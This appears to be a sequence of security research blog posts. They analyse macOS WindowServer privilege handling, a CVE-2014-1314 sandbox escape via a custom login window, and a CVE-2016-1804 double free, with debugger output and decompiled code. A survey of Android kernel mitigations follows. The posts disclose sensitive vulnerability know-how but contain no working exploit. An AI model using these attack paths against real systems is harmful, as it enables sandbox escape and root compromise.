    0x7fff6314d307 <+15>: jmp    0x7fff6314c89c            ; cerror_nocancel
    0x7fff6314d30c <+20>: ret
Executable module set to "/System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer".
Architecture set to: x86_64-apple-macosx.
(lldb) expr -- (int)getuid()
(int) $0 = 0
(lldb) expr -- (int)getgid()
(int) $1 = 0
(lldb) expr -- (int)geteuid()
(int) $2 = 0
(lldb) expr -- (int)getegid()
(int) $3 = 0

Then some code is executed to change WindowServer’s euid to 88 (_windowserver), while its uid is never changed. That limits what the process can do if we only have a logic bug, as _windowserver’s permission is quite limited:

(lldb) bt
* thread #1: tid = 0x2ef1, 0x00007fff955c364c libsystem_kernel.dylib`seteuid, queue = 'com.apple.main-thread', stop reason = breakpoint 1.2
  * frame #0: 0x00007fff955c364c libsystem_kernel.dylib`seteuid
    frame #1: 0x00007fff8612db15 CoreGraphics`CGXRestoreCredentials + 192
    frame #2: 0x00007fff8641024d CoreGraphics`CGXRunOneServicesPass + 784
    frame #3: 0x00007fff86314f9d CoreGraphics`post_notification(CGSNotificationType, void*, unsigned long, bool, double, int, unsigned int const*, int) + 325
    frame #4: 0x00007fff861fc4f2 CoreGraphics`CGXDisplaysWillReconfigure + 1230
    frame #5: 0x00007fff861f6110 CoreGraphics`reconfigureDisplays + 2351
    frame #6: 0x00007fff861f36b6 CoreGraphics`setup_and_reconfigure_displays + 314
    frame #7: 0x00007fff86412001 CoreGraphics`CGXServer + 6213
    frame #8: 0x000000010cc24f7e WindowServer`_mh_execute_header + 3966
    frame #9: 0x00007fff91e975ad libdyld.dylib`start + 1
    frame #10: 0x00007fff91e975ad libdyld.dylib`start + 1
(lldb) reg read
General Purpose Registers:
       rax = 0x0000000000000000
       rbx = 0x0000000000000058
       rcx = 0x00007fff955c363e  libsystem_kernel.dylib`setegid + 10
       rdx = 0x0000000000000000
       rdi = 0x0000000000000058 // change euid to _windowserver(88)
       rsi = 0x00007fff52fd2fa0
       rbp = 0x00007fff52fcaf30
       rsp = 0x00007fff52fcaef8
        r8 = 0x0000000000000002
        r9 = 0x0000000000000000
       r10 = 0x00007fff955c3656  libsystem_kernel.dylib`seteuid + 10
       r11 = 0x0000000000000292
       r12 = 0x00007fc8c1412290
       r13 = 0x0000000000000101
       r14 = 0x0000005800000058
       r15 = 0x00007fff52fd2fa0
       rip = 0x00007fff955c364c  libsystem_kernel.dylib`seteuid
    rflags = 0x0000000000000202
        cs = 0x000000000000002b
        fs = 0x0000000000000000
        gs = 0x0000000000000000

And that makes the ps utility show _windowserver in its output:

_windowserver 910 0.0  1.6  3368352  78004   ??  SXs   7:51AM   0:02.57 /System/Library/Frameworks/ApplicationServices.framework/Frameworks/CoreGraphics.framework/Resources/WindowServer -daemon

That is quite confusing. If we use lldb, we can clearly see that its euid is _windowserver while its uid is still root, which makes WindowServer a privilege chameleon.

(lldb) expr -- (int)getuid()
(int) $4 = 0
(lldb) expr -- (int)geteuid()
(int) $5 = 88
(lldb) expr -- (int)getgid()
(int) $6 = 0
(lldb) expr -- (int)getegid()
(int) $7 = 88
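Why setuid(0) succeeds from this state follows from the POSIX permission rule for setuid: an unprivileged caller may still switch to its real or saved user ID. The sketch below is a model of that rule only, not XNU source; struct ids and setuid_permitted are hypothetical names.

```c
#include <stdbool.h>
#include <sys/types.h>

/* The three user IDs a process carries. */
struct ids {
    uid_t ruid;  /* real uid: 0 for WindowServer, as lldb shows above */
    uid_t euid;  /* effective uid: 88 (_windowserver) after seteuid */
    uid_t svuid; /* saved set-user-ID */
};

/* POSIX rule: setuid(target) is permitted for a privileged caller, or
 * when target equals the real or the saved user ID. */
static bool setuid_permitted(const struct ids *c, uid_t target)
{
    return c->euid == 0 || target == c->ruid || target == c->svuid;
}
```

With ruid 0 and euid 88 the call is permitted, whereas a process whose three IDs are all 88 would be refused. That difference is what separates a temporary seteuid drop from a permanent privilege drop.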

So finally we wrap up CVE-2016-1804 with full remote root by chaining it with a Safari exploit.

Oh, wait… How to race and fill in the controlled data between the two frees is still unknown? No worries, next week at Black Hat you will get all the answers…

WindowServer: The privilege chameleon on macOS (Part 1)

2016-07-22T05:02:15.000Z

When talking about Apple Graphics, the WindowServer component should not be neglected. Recently KeenLab has been talking about Apple graphics IOKit components at POC 2015 “OS X Kernel is As Strong as its Weakest Part”, CanSecWest 2016 “Don’t Trust Your Eye: Apple Graphics Is Compromised!”, and RECon 2016 “Shooting the OS X El Capitan Kernel Like a Sniper”; however, the userland part is seldom mentioned in public.

This week the Pwnie Awards announced bug nominations for 2016, where the windowserver bug CVE-2016-1804 is listed, and it made me think of writing something. But when I started writing, I realized it is a long story. Then I realized a long story can be cut into short stories (I also realized my IQ has been low recently, which many of my colleagues have pointed out, due to the extremely hot weather in Shanghai maybe, or not…)

So… I decided to split the whole story into 3 parts. In part 1, I will mainly focus on the history of windowserver, basic concepts, architecture, CVE-2014-1314 (a design flaw which we used to take down OS X Mavericks at Pwn2Own 2014) and finally, details of the Pwnie-nominated bug CVE-2016-1804, which we used to take down the latest OS X El Capitan remotely with a browser exploit and escalate to root privilege. However, when I first discovered CVE-2016-1804 last year, it was considered unexploitable, at least for 1 week. Part 1 wraps up there with questions/challenges.

Next week I will release part 2, on the partial exploitation, by introducing a 0day which gave me the inspiration for the successful exploitation of CVE-2016-1804. The last part, part 3, which is the most exciting part, is NOT a blog post; instead it will be discussed at the Black Hat 2016 Briefings talk “SUBVERTING APPLE GRAPHICS: PRACTICAL APPROACHES TO REMOTELY GAINING ROOT”.

Ok, now let’s start the short story:

0x1 Introduction

Apple Graphics is one of the most complex components in the Apple world (OS X and iOS). It mainly contains the following two parts:
– Userland part
– Kernel IOKit drivers
OS X and iOS have a similar graphics architecture. The userland graphics of OS X is mainly handled by the “WindowServer” process, while on iOS it is the “SpringBoard/backboardd” process. The userland graphics combined with the kernel graphics drivers are considered the counterpart of “win32k.sys” on Windows, although the architectures differ a little. The userland part of Apple graphics is handled in a separate process, while Windows provides a set of GDI32 APIs which call the kernel “win32k.sys” directly. Apple’s approach is more secure from an architectural perspective, as the userland virtual memory is not shared between processes, which increases the exploitation difficulty, especially when SMEP/SMAP is not enforced.

0x2 WindowServer Overview

The WindowServer process mainly contains two private frameworks: CoreGraphics and QuartzCore, each running in a separate thread. Each framework contains two sets of APIs:
– Client side API: Functions starting with “CGS” (CoreGraphics) or “CAS” (QuartzCore)
e.g.

void __fastcall _CGSGetWindowShape(mach_port_t a1, int a2, _QWORD *a3, _DWORD *a4)
{
...
}

– Server side API: Functions starting with “__X” (e.g. __XCreateSession)
e.g.

__int64 __fastcall _XGetWindowShape(_DWORD *a1, __int64 a2)
{
...
}

The client side API can be called from any client process. Client APIs are implemented by obtaining the target mach port, composing a mach message and sending the message by calling the mach_msg Mach API with a specific message ID and send/receive sizes. The server side API is called by WindowServer’s specific thread. Both the CoreGraphics and QuartzCore threads have a dedicated server loop waiting for new client messages to arrive. Once a client message arrives, the dispatcher code receives the message and calls the corresponding server API based on the message ID.
Here is a snapshot of WindowServer process:
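The dispatch step described above can be sketched as a table lookup on the message ID. Everything in this block is illustrative: the IDs 1001 and 1002, the handler names and the reply convention are assumptions, not the real WindowServer routing table. The only real value is -303, which matches MIG_BAD_ID in mig_errors.h.

```c
#include <stddef.h>
#include <stdint.h>

#define DISPATCH_BAD_ID (-303) /* same value as MIG_BAD_ID */

/* A server-side routine: reads a request, fills in a reply. */
typedef int (*server_fn)(const void *request, int *reply);

/* Hypothetical handlers standing in for _XGetWindowShape and friends. */
static int x_get_window_shape(const void *request, int *reply)
{
    (void)request;
    *reply = 1;
    return 0;
}

static int x_move_window(const void *request, int *reply)
{
    (void)request;
    *reply = 2;
    return 0;
}

struct route {
    int32_t msg_id; /* hypothetical message IDs */
    server_fn handler;
};

static const struct route routes[] = {
    { 1001, x_get_window_shape },
    { 1002, x_move_window },
};

/* Find the handler for msg_id and call it, as the server loop would. */
static int dispatch(int32_t msg_id, const void *request, int *reply)
{
    for (size_t i = 0; i < sizeof routes / sizeof routes[0]; i++)
        if (routes[i].msg_id == msg_id)
            return routes[i].handler(request, reply);
    return DISPATCH_BAD_ID;
}
```

Because one loop serves every request on a thread, two CoreGraphics handlers can never run concurrently, which matters later when a race needs to be won.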

0x3 Sandbox consideration

Almost every process (including sandboxed applications) can call interfaces in the WindowServer process through MIG (Mach Interface Generator) IPC. Browser applications including Safari can directly reach WindowServer interfaces from a restrictive sandboxed context. Vulnerabilities in the WindowServer process may lead to sandbox escape from a remote browser-based drive-by attack. They may also lead to root privilege escalation, as the WindowServer process behaves like a privilege chameleon. The Safari WebContent process has its own sandbox profile defined in /System/Library/Frameworks/WebKit.framework/Versions/A/Resources/com.apple.WebProcess.sb, where the WindowServer service API is allowed by the following rule:

(allow mach-lookup      (global-name "com.apple.windowserver.active"))

Here it seems the QuartzCore interface is not explicitly defined, so we focus on CoreGraphics interfaces first.

Three years ago, when we decided to explore sandbox escape vulnerabilities on OS X, we picked attack surfaces which met the following criteria:

Interfaces which can be reached by the browser (because at that time my IQ was not that low.)
Components which run with weak sandbox profiles or no sandbox
Components which have been around for a long time, especially those born before the Apple Sandbox was introduced in OS X Leopard. This is typical hacker thinking, which I learned from the ASLR story. When ASLR was first introduced in Windows Vista, a lot of previously useless information leak vulnerabilities became vital in breaking ASLR. Most of them can be exploited very reliably, as they have nothing to do with memory corruption; instead they are just logic flaws which were never considered flaws before ASLR was born.
etc.

After that, windowserver became one of our key focuses in vulnerability discovery work.

0x4 MIG IPC

MIG IPC can be described by the following graph from the Google Project Zero team blog:

Source: http://googleprojectzero.blogspot.kr/2014/11/pwn4fun-spring-2014-safari-part-ii.html

Like the IPC on other modern OSes, MIG IPC can pass information between processes. Consider the following scenarios, where the kernel is involved in the IPC:

When process A wants to pass a pointer to process B
When process A wants to pass a mach port to process B (on Windows, the similar concept is HANDLE)
In the above scenarios, it is not enough just to pass the value itself between processes; instead, the kernel needs to map the address, or allocate a mach port which represents the kernel object, for the target process. In the Apple world, the message in the first scenario is called an Out Of Line (OOL) descriptor message and the one in the second is called a port descriptor message.
Let’s look at the API mach_msg defined by MIT:
```
mach_msg_return_t   mach_msg
                    (mach_msg_header_t               *msg,
                     mach_msg_option_t             option,
                     mach_msg_size_t            send_size,
                     mach_msg_size_t        receive_limit,
                     mach_port_t             receive_name,
                     mach_msg_timeout_t           timeout,
                     mach_port_t                   notify);
```

PARAMETERS
msg
[pointer to in/out structure containing random and reply rights]
A message buffer used by mach_msg both for send and receive. This must be naturally aligned.

The msg parameter is interesting: it starts with a mach_msg_header_t structure:

typedef struct
{
  mach_msg_bits_t msgh_bits;
  mach_msg_size_t msgh_size;
  mach_port_t msgh_remote_port;
  mach_port_t msgh_local_port;
  mach_port_name_t msgh_voucher_port;
  mach_msg_id_t msgh_id;
} mach_msg_header_t;

Here the highest bit of the 32-bit msgh_bits defines whether it is a simple message (0x0) or a complex one (0x1). A simple message means no pointer or port is passed to the target process, and in this case the real message data is just appended right after the mach_msg_header_t.
Complex messages can be categorized into 3 types:

typedef union
{
  mach_msg_port_descriptor_t port;
  mach_msg_ool_descriptor_t out_of_line;
  mach_msg_ool_ports_descriptor_t ool_ports;
  mach_msg_type_descriptor_t type;
} mach_msg_descriptor_t;

The three types are:

mach_msg_port_descriptor_t: a port descriptor message
mach_msg_ool_descriptor_t: OOL descriptor message
mach_msg_ool_ports_descriptor_t: OOL port descriptor (Pointer pointing to a list of mach ports)
The type definition is:
#define MACH_MSG_PORT_DESCRIPTOR 0
#define MACH_MSG_OOL_DESCRIPTOR 1
#define MACH_MSG_OOL_PORTS_DESCRIPTOR 2

So when you want to send a complex message, set the highest bit of the 32-bit msgh_bits to 1 in mach_msg_header_t, followed by a mach_msg_body_t whose msgh_descriptor_count indicates the number of complex descriptors in the message:

typedef struct
{
        mach_msg_size_t msgh_descriptor_count;
} mach_msg_body_t;

Then append a list of mach_msg_port_descriptor_t, mach_msg_ool_descriptor_t, or mach_msg_ool_ports_descriptor_t entries to finish composing the message, and send it to the target process.

It may seem useless to put these basic concepts here, but believe me, it is useful (maybe in part 2).
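The layout of a complex message can be sketched in portable C. The structs below are simplified stand-ins defined locally so that the example compiles anywhere; they mirror the field order shown above but are not the real mach/message.h types, and build_port_message is a hypothetical helper. The complex flag value 0x80000000 matches MACH_MSGH_BITS_COMPLEX.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MSGH_BITS_COMPLEX    0x80000000u /* highest bit of msgh_bits */
#define PORT_DESCRIPTOR_TYPE 0           /* MACH_MSG_PORT_DESCRIPTOR */

/* Simplified stand-ins for the Mach structures (assumed layout). */
struct sketch_header {
    uint32_t bits, size, remote_port, local_port, voucher_port;
    int32_t id;
};
struct sketch_body { uint32_t descriptor_count; };
struct sketch_port_descriptor {
    uint32_t name;
    uint32_t pad1;
    uint16_t pad2;
    uint8_t disposition;
    uint8_t type;
};

/* Lay out header, body and one port descriptor in buf.
 * Returns the message size, or 0 if buf is too small. The low bits of
 * msgh_bits, which carry port right types in a real message, are left
 * zero in this sketch. */
static size_t build_port_message(unsigned char *buf, size_t cap,
                                 uint32_t remote_port, int32_t msg_id,
                                 uint32_t port_name)
{
    struct sketch_header h = {0};
    struct sketch_body b = { 1 }; /* exactly one descriptor follows */
    struct sketch_port_descriptor d = {0};
    size_t total = sizeof h + sizeof b + sizeof d;

    if (cap < total)
        return 0;
    h.bits = MSGH_BITS_COMPLEX;
    h.size = (uint32_t)total;
    h.remote_port = remote_port;
    h.id = msg_id;
    d.name = port_name;
    d.type = PORT_DESCRIPTOR_TYPE;

    memcpy(buf, &h, sizeof h);
    memcpy(buf + sizeof h, &b, sizeof b);
    memcpy(buf + sizeof h + sizeof b, &d, sizeof d);
    return total;
}
```

On macOS the real definitions come from mach/message.h and the buffer would be handed to mach_msg; this sketch stops at composing the bytes.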

0x5 CoreGraphics Interface

The CoreGraphics interfaces are divided into the following categories:
– Workspace
– Window
– Transitions
– Session
– Region
– Surface
– Notifications
– HotKeys
– Display
– Cursor
– Connection
– CIFilter
– Event Tap
– Misc
When the sandbox was introduced on Leopard, the first thought for bypassing it was to do a series of simulated mouse/keyboard operations (for example, to simulate moving to the calc icon and double-clicking it). The first trial made me excited, because it was quite easy to move the cursor anywhere on the window from a sandboxed environment by calling _XWarpCursorPosition:

__int64 __fastcall _XWarpCursorPosition(_DWORD *_RDI, __int64 a2)
{
  __int64 *v6; // rdi@3
  signed int v7; // er14@3
  __int64 v13; // r15@7
  __int64 v14; // rax@7
  __int64 result; // rax@14
  int v21; // [rsp+0h] [rbp-20h]@3

  if ( *_RDI < 0 || _RDI[1] != 44 )
  {
    *(_DWORD *)(a2 + 32) = -304;
  }
  ...
    v7 = CGXWarpCursorPosition(0LL);
  ...
  return result;
}

And I quickly located the function to post a double-click event, __XPostFilteredEventTapDataSync:

__int64 __fastcall _XPostFilteredEventTapDataSync(_DWORD *a1, __int64 a2)
{
  ...
  else
  {
    *(_DWORD *)(a2 + 32) = post_filtered_event_tap_data(a1[8], a1[9], (unsigned int)a1[10], a1[11], a1 + 13, v3);
  }
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

However, post_filtered_event_tap_data unfortunately checks the sandbox:

__int64 __fastcall post_filtered_event_tap_data(unsigned int a1, unsigned int a2, __int64 a3, unsigned int a4, _DWORD *a5, unsigned int a6)
{
...
  if ( CGXSenderCanSynthesizeEvents() ) //check here
  {
  ...
}

bool CGXSenderCanSynthesizeEvents()
{
  unsigned int v0; // ecx@1
  bool result; // al@2

  v0 = WSGetLastMessageAuditTrailerPid();
  if ( v0 )
    result = (unsigned int)sandbox_check(v0, "hid-control", 0LL) == 0; // failed to pass the check
  else
    result = 0;
  return result;
}

Because most sandboxed applications won’t have the “hid-control” entitlement, my initial trial had to stop here.

Another thought was to add a customized hotkey by calling _XSetHotKey, but that also ended in failure:

__int64 __fastcall _XSetHotKey(__int64 a1, __int64 a2)
{
  ...
  if ( v20 && (unsigned int)sandbox_check(*(unsigned int *)(v20 + 284), "hid-control", 0LL) ) //sandbox check here
            goto LABEL_39;
        }
      }
...
LABEL_39:
    *(_DWORD *)(a2 + 32) = v7;
    goto LABEL_40;
  }
  *(_DWORD *)(a2 + 32) = -304;
LABEL_40:
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a2 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}

Actually, among the above API set, many interfaces are regarded as “unsafe”, so a sandbox check is performed in those server-side APIs. Typical examples include event tap, hotkey configuration, etc. Because of that, in a sandboxed application, dangerous operations such as adding a hotkey or posting an event tap (e.g. sending a mouse click event) are strictly forbidden.

On the other hand, some interfaces are partially allowed. Typical examples include CIFilter, window-related interfaces, etc. Such interfaces perform operations on specific entities that belong to the caller’s process. For example, the API __XMoveWindow performs a window move operation. It accepts a user-provided window ID and calls the connection_holds_rights_on_window function to determine whether the caller’s process is allowed to move the window. Only the window owner’s process is allowed to do such operations (or a special entitlement is needed to perform operations on any window):

__int64 __usercall _XMoveWindow@(__int64 a1@, _DWORD *a2@, __int64 a3@, __int128 _XMM0@)
{
 
    if ( (unsigned __int8)connection_holds_rights_on_window(v8, 1LL, v7, 1LL, 1LL) //check window rights of the source process
      || (v9 = 1000, v7)
      && (v10 = (unsigned __int8)connection_holds_rights_on_window(v8, 4LL, v7, 1LL, 1LL) == 0, v9 = 1000, !v10) )
    {
      __asm
      {
        vcvtsi2ss xmm0, xmm0, r12d
        vcvtsi2ss xmm1, xmm0, r13d
      }
      v9 = CGXMoveWindowList(v8, (char *)&v14 + 4, 1LL);
    }
    *(_DWORD *)(a3 + 32) = v9;
  }
  result = *(_QWORD *)NDR_record_ptr;
  *(_QWORD *)(a3 + 24) = *(_QWORD *)NDR_record_ptr;
  return result;
}
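The "partially allowed" pattern boils down to an ownership check before the operation is carried out. A minimal sketch follows, assuming a flat array of windows, each tagged with the connection that created it. The struct, the function names and the privileged flag are hypothetical; 1000 is the value the decompiled code above leaves in v9 when the rights check fails.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define ERR_NO_RIGHTS 1000 /* value left in v9 when the check fails */

struct window {
    uint32_t id;
    uint32_t owner_cid; /* connection that created the window */
    int x, y;
};

/* The caller may act on a window it owns, or on any window if it holds
 * a special entitlement (modelled here as a boolean). */
static bool holds_rights(const struct window *w, uint32_t caller_cid,
                         bool privileged)
{
    return privileged || w->owner_cid == caller_cid;
}

/* Move window wid to (x, y) on behalf of caller_cid. */
static int move_window(struct window *wins, size_t n, uint32_t caller_cid,
                       bool privileged, uint32_t wid, int x, int y)
{
    for (size_t i = 0; i < n; i++) {
        if (wins[i].id != wid)
            continue;
        if (!holds_rights(&wins[i], caller_cid, privileged))
            return ERR_NO_RIGHTS;
        wins[i].x = x;
        wins[i].y = y;
        return 0;
    }
    return ERR_NO_RIGHTS; /* unknown window ID */
}
```

The important detail is that the window ID comes from the client, so the server has to resolve it and check ownership itself rather than trust the caller.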

At this point, I believed Apple had considered everything needed to make the Apple sandbox compatible with those older components.
But luckily I started thinking about all of this in 2013, which was a pretty good time. I finally found a bug which Apple had failed to consider.

0x6 CVE-2014-1314: the old legend

As we know, the Apple sandbox was introduced not long ago, while Apple graphics has a much longer history. The original design of Apple graphics doesn’t take the sandbox into account. Although years have been spent improving graphics security in the sandboxed context, there are still issues left. CVE-2014-1314 is a typical example, which I used at Pwn2Own 2014. The issue exists in the CoreGraphics session APIs. CoreGraphics provides a client side API, CGSCreateSessionWithDataAndOptions, which sends a request to be handled by the server side API _XCreateSession.
_XCreateSession will reach the following code:

__int64 __fastcall __CGSessionLaunchWorkspace_block_invoke(__int64 a1)
{
  ...
  v28 = fork(); // fork
  if ( v28 == -1 )
  {
    v29 = *__error();
    CGSLogError("%s: cannot fork workspace (%d)", v37);
    v3 = 1011;
  }
  else
  {
    if ( !v28 )
    {
      setgid(HIDWORD(v24));
      setuid(v24); // set uid to current user’s uid
      setsid();
      chdir("/");
      v35 = open("/dev/null", 2, 0LL);
      v36 = v35;
      if ( v35 != -1 )
      {
        dup2(v35, 0);
        dup2(v36, 1);
        dup2(v36, 2);
        ...
        if ( v36 >= 3 )
          close(v36);
      }
      execve(v9, v40, v44);
      _exit(127);
    }

This function allows the user to create a new logon session. By default, WindowServer will create a new process from “/System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow” and launch the login window under the current user’s context (by calling setuid and setgid with the user’s IDs. Oh, WindowServer can setuid!!). Apple also allows the user to specify a customized login window, which in turn allows attackers in the sandboxed context to run any process in an unsandboxed context.

0x7 CVE-2016-1804: the memory corruption

Now let’s come back to the year 2016. In CoreGraphics, some new interfaces (we count them in the Misc category) were introduced to align with new MacBook models. For example, the interface _XSetGlobalForceConfig allows a user to configure force touch. Users can serialize force touch configuration data and provide it to the interface. _XSetGlobalForceConfig wraps the serialized data in a CFData and calls the _mthid_unserializeGestureConfiguration API to unserialize the data.

__int64 __fastcall _XSetGlobalForceConfig(__int64 a1, __int64 a2)
{
...
   v5 = *(_QWORD *)(a1 + 28); //v5 is a pointer pointing to user controllable data
   v6 = CFDataCreateWithBytesNoCopy(*(_QWORD *)kCFAllocatorDefault_ptr, 
        v5, 
        v4, 
        *(_QWORD *)kCFAllocatorNull_ptr); // create CFData on v5
  
  v7 = _mthid_unserializeGestureConfiguration(v6); //try to unserialize the data
   if ( v6 )
     CFRelease(v6, v5); //free the CFData twice!
...
}

_mthid_unserializeGestureConfiguration does not retain the CFData, yet it calls CFRelease to free the data if the force touch configuration is not valid. After _mthid_unserializeGestureConfiguration returns, _XSetGlobalForceConfig frees the data again, which causes a double free.

__int64 __fastcall _mthid_unserializeGestureConfiguration(__int64 a1)
{
  ...
  if ( v2 )
  {
    if ( !(unsigned __int8)_mthid_isGestureConfigurationValid(v2) )
      CFRelease(a1); // if the data is invalid, free it once
    result = v2;
  }
  ...
  return result;
}
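
To make the ownership mistake concrete, here is a toy model of the two code paths. It is a sketch under stated assumptions: struct blob and every function name are hypothetical stand-ins for CFData, CFRetain and CFRelease, and nothing is actually freed, so the over-release shows up as a negative count instead of a crash.

```c
#include <stdbool.h>

/* Toy reference-counted object; stands in for the CFData in the text. */
struct blob {
    int refcount; /* 1 right after creation */
    bool valid;   /* whether the "configuration" parses */
};

static void blob_retain(struct blob *b)  { b->refcount++; }
static void blob_release(struct blob *b) { b->refcount--; }

/* Buggy callee: releases a reference it never took when the data is invalid. */
static void unserialize_buggy(struct blob *b)
{
    if (!b->valid)
        blob_release(b);
}

/* Balanced callee: retains on entry and releases exactly that reference. */
static void unserialize_balanced(struct blob *b)
{
    blob_retain(b);
    /* ... parse ... */
    blob_release(b);
}

/*
 * Caller mirrors the shape of _XSetGlobalForceConfig: create, unserialize,
 * release. Returns the final reference count; a negative value means the
 * object was released more often than it was owned.
 */
int handle_request(bool valid, bool use_buggy_callee)
{
    struct blob b = { .refcount = 1, .valid = valid };
    if (use_buggy_callee)
        unserialize_buggy(&b);
    else
        unserialize_balanced(&b);
    blob_release(&b); /* the caller's own release */
    return b.refcount;
}
```

Only the combination of invalid data and the buggy callee ends below zero, which matches the condition described above.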

0x8 Wrap-up: exploitable?

CVE-2016-1804 looks unexploitable because:

The time window between the two frees is small (does it crash if we fail to fill in data in between?)
All CoreGraphics interfaces run in a server loop on a single thread, so it is not possible to use another CoreGraphics API to race and refill the freed memory from another thread.
ASLR/DEP still have to be considered.

I leave these questions to the readers and will discuss the exploitation in Part 2 next week.

Emerging Defense in Android Kernel

2016-06-01T13:33:23.000Z

There was a time when every Linux kernel hacker loved Android. It came with a stone-age kernel with barely any exploit mitigation. Writing an exploit with any available N-day was a walk in the park.
Nowadays Google, ARM and many SoC/device vendors have put a lot of effort into hardening the security of Android, including its kernel, which is (in most cases) the last line of defense against attack.

As a group of Android gurus focusing on rooting, we probably face these defenses more often than researchers in other fields. In this post we summarize the kernel exploit mitigations that have appeared in the last two years and share our opinions on their effectiveness.

Note that this post focuses on how the mitigations are implemented. We may point out their weaknesses, but we will not detail bypass techniques for each mitigation.

Outline

Hardware
Google/Linux
Vendors
- Samsung
- Others

Hardware

As Intel has officially abandoned its Atom product line, no one is going to challenge ARM’s dominance on Android any time soon. We will focus on ARM for the rest of this post, since no one cares about any other architecture for Android :p

MMU
Modern ARM processors come with a comprehensive MMU, providing basic virtual-to-physical (V2P) translation, access control, TLB, ASIDs and many other memory management features. Among them, both the 32-bit (arm) and 64-bit (arm64) modes of recent ARM architectures provide full RWX access control at page level. In addition, one of the key “advanced” security features is PXN (Privileged Execute-Never), which is similar in idea to Intel’s SMEP but differs in implementation details. PXN has been widely enabled on 64-bit devices as a mitigation against ret2usr attacks.
Details on how the Android kernel uses these features are discussed in later sections.

TrustZone
TrustZone is an extension to ARM cores, which creates two “worlds”. The following figure describes how this works:

Source: https://genode.org/documentation/articles/trustzone

Although there are few restrictions on how a vendor can use TrustZone, the feature-rich OS (Android, in our case) usually runs in the normal world. The secure world hosts trustlets on a lightweight OS.
Because the secure world runs in parallel with the normal world, compromising the kernel in the normal world should not affect the secure world if the implementation is done properly, as their communication is handled by privileged monitor-mode code that is usually loaded by the low-level bootrom. However, there have been cases where the secure world was also compromised due to its own bugs or bugs in monitor mode.

Google/Linux

As the most widely used open source software, the Linux kernel is modified by many parties, and not all of these modifications are merged into mainline. Here we only discuss features that are implemented in mainline and appear in Google’s Android kernel repositories.
The Linux kernel uses many features to harden itself. One of them is protecting critical memory regions such as kernel text and read-only data. Recent mainline kernels implement this through CONFIG_DEBUG_RODATA:

CONFIG_DEBUG_RODATA

arm
    prompt: Make kernel text and rodata read-only
    type: bool
    depends on: ( CONFIG_MMU && ! CONFIG_XIP_KERNEL ) && ( CONFIG_CPU_V7 )
    defined in arch/arm/mm/Kconfig
    found in Linux kernels: 3.19, 4.0–4.6, 4.6+HEAD
    Help text:
    If this is set, kernel text and rodata memory will be made read-only, and non-text kernel memory will be made non-executable. The tradeoff is that each region is padded to section-size (1MiB) boundaries (because their permissions are different and splitting the 1M pages into 4K ones causes TLB performance problems), which can waste memory.

arm64
    prompt: Make kernel text and rodata read-only
    type: bool
    depends on: (none)
    defined in arch/arm64/Kconfig.debug
    found in Linux kernels: 4.0–4.6, 4.6+HEAD
    Help text:
    If this is set, kernel text and rodata will be made read-only. This is to help catch accidental or malicious attempts to change the kernel's executable code.
    If in doubt, say Y

Note that despite having “DEBUG” in its name, this is actually recommended for arm64. It should be enabled by default for arm also.

During kernel boot, in init/main.c, kernel_init() will call mark_rodata_ro() to literally mark every read-only section with proper permissions:

static int __ref kernel_init(void *unused)
{
    kernel_init_freeable();
...
    mark_rodata_ro();
...
}

Function mark_rodata_ro() will do nothing if CONFIG_DEBUG_RODATA is not defined:

#ifndef CONFIG_DEBUG_RODATA
static inline void mark_rodata_ro(void) { }
#endif

If it is defined, though, the implementation of mark_rodata_ro() is architecture specific, which means you should look for its definition in arch/arm and arch/arm64. For both architectures, the Linux kernel uses “section” page entries to improve performance and reduce the memory footprint of the page table for the kernel virtual address space. A “section” entry usually sits one level above an actual page entry (which represents one page). This lets the MMU walk the page table faster by reducing its depth, and makes the TLB more efficient, as there are far fewer entries to cache. It comes at a cost, though: sections must be aligned at MiB granularity (1MB or 2MB), so some physical RAM can be wasted. This is a minor problem for modern devices, as many of them have more than 2GB of RAM.
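
The memory cost of section alignment is simple arithmetic. As a rough sketch (the function names and the example addresses in the note below are made up for illustration), the padding needed to reach the next section boundary can be computed like this:

```c
#include <stdint.h>

#define SECTION_SIZE_1M (UINT64_C(1) << 20) /* section size named in the arm help text */
#define SECTION_SIZE_2M (UINT64_C(2) << 20) /* the 2MB granularity mentioned above */

/* Round addr up to the next multiple of align (align must be a power of two). */
static uint64_t align_up(uint64_t addr, uint64_t align)
{
    return (addr + align - 1) & ~(align - 1);
}

/* Bytes of padding added when a region ending at `end` is padded to a section boundary. */
uint64_t section_padding(uint64_t end, uint64_t section_size)
{
    return align_up(end, section_size) - end;
}
```

For a region ending at the illustrative address 0x523456, section_padding(0x523456, SECTION_SIZE_1M) gives 0xDCBAA, a little under 1MiB. The worst case per region is always just below one section.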

You may have noticed that the kernel versions mentioned above are well beyond the versions commonly seen in Android (3.19+ vs. 3.4/3.10/3.18). However, since the patch is really simple, Google and other vendors actively back-port these features to their own kernel repositories. This has caused some chaos, in that the actual code varies among vendors, but in the end they all do the same thing: set up the page table entries for the kernel virtual address space.

For arm, a section page entry means a first-level section type PMD (folded up). Per the ARM definition, the second bit (bit 1) of the entry indicates whether it is a conventional entry or a section one. Note that supersections are not used here.

Origin: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dai0425/BABCDECH.html

The bit AP[2], aka APX, together with AP[1:0], will determine both user and privileged permissions:

  APX  AP[1:0]  Privileged   User
  0    b00      No access    No access
  0    b01      Read/write   No access
  0    b10      Read/write   Read-only
  0    b11      Read/write   Read/write
  1    b00      –            –
[ 1    b01      Read-only    No access ]
  1    b10      Read-only    Read-only
  1    b11      Read-only    Read-only

Source: http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0211k/Caceaije.html
So for any kernel text/rodata section, it will be APX:=1 and AP[1:0]:=b01. This is defined in mainline code in arch/arm/mm/init.c:

#ifdef CONFIG_DEBUG_RODATA
static struct section_perm ro_perms[] = {
       /* Make kernel code and rodata RX (set RO). */
       {
               .start  = (unsigned long)_stext,
               .end    = (unsigned long)__init_begin,
...
               .mask   = ~(PMD_SECT_APX | PMD_SECT_AP_WRITE),
               .prot   = PMD_SECT_APX | PMD_SECT_AP_WRITE,
               .clear  = PMD_SECT_AP_WRITE,
#endif
       },
};
#endif
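
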